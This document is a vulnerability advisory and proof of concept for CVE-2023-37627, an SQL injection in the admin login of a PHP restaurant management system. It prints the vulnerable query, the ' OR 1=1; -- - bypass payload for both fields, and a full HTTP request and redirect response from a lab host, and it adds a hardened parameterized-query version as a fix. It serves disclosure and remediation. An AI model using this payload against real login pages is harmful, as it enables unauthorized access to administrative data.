CVE-2023-37627: PoC for CVE-2023-37627

Code-projects Online Restaurant Management System 1.0 is vulnerable to SQL Injection. Through SQL injection, an attacker can bypass the admin panel and view order records, add items, delete items etc.

CVE
Product : Online Restaurant Management System - 1.0
Vulnerability Type : SQL Injection
Vendor of Product : code-projects

Desc : An attacker can bypass the admin panel and view order records, add items, delete items etc.

Vulnerable Code

// file : index.php
…
$email = $_POST['email'];
$password = $_POST['password'];

// Untrusted POST values are interpolated straight into the SQL text.
// prepare() here gives no protection because the query has no bound parameters.
$sql = "SELECT * FROM admin WHERE email='$email' AND password='$password'";

$query = $pdoconn->prepare($sql);
$query->execute();
$arr_login = $query->fetchAll(PDO::FETCH_ASSOC);
…

POC

The admin login panel can be bypassed by supplying `' OR 1=1; -- -` as either the "password" or the "username" value.

SELECT * FROM admin WHERE email='vulnweb@pwned.tld' AND password='' or 1=1; -- - '

Email validation is present only in the frontend. It can be bypassed either by disabling JavaScript or by sending a POST request directly to admin/login-admin.php.

SELECT * FROM admin WHERE email='' or 1=1; -- -' AND password='vulnweb'   -- injecting the email field

When logging in with the password `' OR 1=1; -- -`, we get a 302 redirect to "dashboard.php", indicating that the admin login has been bypassed.
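For contrast with the vulnerable snippet and the frontend-only email check described above, here is a hardened version of the same login logic. This is an added example, not code from the Online Restaurant Management System; it assumes the same `$pdoconn` PDO handle and the same `admin` table with `email` and `password` columns, and it additionally assumes (hypothetically) that the `password` column stores a `password_hash()` digest rather than plaintext. The in-memory SQLite setup at the bottom is constructed so the example runs offline.

```php
<?php
// Added example (not the project's code): hardened replacement for the
// admin login logic. Assumes $pdoconn, table "admin", columns "email"/"password".
// Assumption (hypothetical): "password" holds a password_hash() digest.

declare(strict_types=1);

// Precomputed digest used when no row matches, so a failed lookup costs the
// same time as a real verification and does not reveal which emails exist.
const DUMMY_HASH = '$2y$10$abcdefghijklmnopqrstuu5N7l9d5zYq1B5nU0Jrq3w8fZtO1p2Fa';

function authenticateAdmin(PDO $pdoconn, string $email, string $password): bool
{
    // 1. Server-side validation. The frontend check can be disabled or skipped
    //    by posting directly to the endpoint, so it is repeated here.
    $email = filter_var(trim($email), FILTER_VALIDATE_EMAIL);
    if ($email === false || $password === '') {
        return false;
    }

    // 2. Parameterized query. The input is bound as data, never spliced into
    //    the SQL text, so a value such as ' OR 1=1; -- - is just a string.
    $stmt = $pdoconn->prepare('SELECT id, password FROM admin WHERE email = :email LIMIT 1');
    $stmt->bindValue(':email', $email, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // 3. Verify the password in PHP, not in the WHERE clause.
    $storedHash = ($row !== false) ? (string) $row['password'] : DUMMY_HASH;
    $verified = password_verify($password, $storedHash);

    return $verified && $row !== false;
}

// --- Constructed stand-in for the project's database, so this file runs offline ---
$pdoconn = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$pdoconn->exec('CREATE TABLE admin (id INTEGER PRIMARY KEY, email TEXT UNIQUE, password TEXT)');
$ins = $pdoconn->prepare('INSERT INTO admin (email, password) VALUES (:e, :p)');
$ins->execute([
    ':e' => 'admin@example.test',                                    // constructed account
    ':p' => password_hash('correct horse battery', PASSWORD_DEFAULT), // constructed credential
]);

// Constructed inputs: the PoC payload from this advisory, then a legitimate login.
var_dump(authenticateAdmin($pdoconn, 'vulnweb@pwned.tld', "' or 1=1; -- -"));
var_dump(authenticateAdmin($pdoconn, 'admin@example.test', 'correct horse battery'));
```

The two changes that matter for this CVE are the bound `:email` parameter, which removes the injection entirely, and moving the password comparison out of the SQL so that the query can never be coerced into returning "any admin row". Re-validating the email on the server closes the bypass the advisory notes for the frontend-only check.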

Request

POST /RestroGirls/admin/login-admin.php HTTP/1.1
Host: 192.168.56.101
Content-Length: 45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.56.101
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.56.101/RestroGirls/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=fngds5pmj5jnvtbref6qqoskuk
Connection: close

email=vulnweb%40pwned.tld&password=%27+or+1%3D1%3B+--+-

Response

HTTP/1.1 302 Found
Date: Wed, 12 Jul 2023 01:04:04 GMT
Server: Apache/2.4.55 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: dashboard.php
Content-Length: 4
Connection: close
Content-Type: text/html; charset=UTF-8
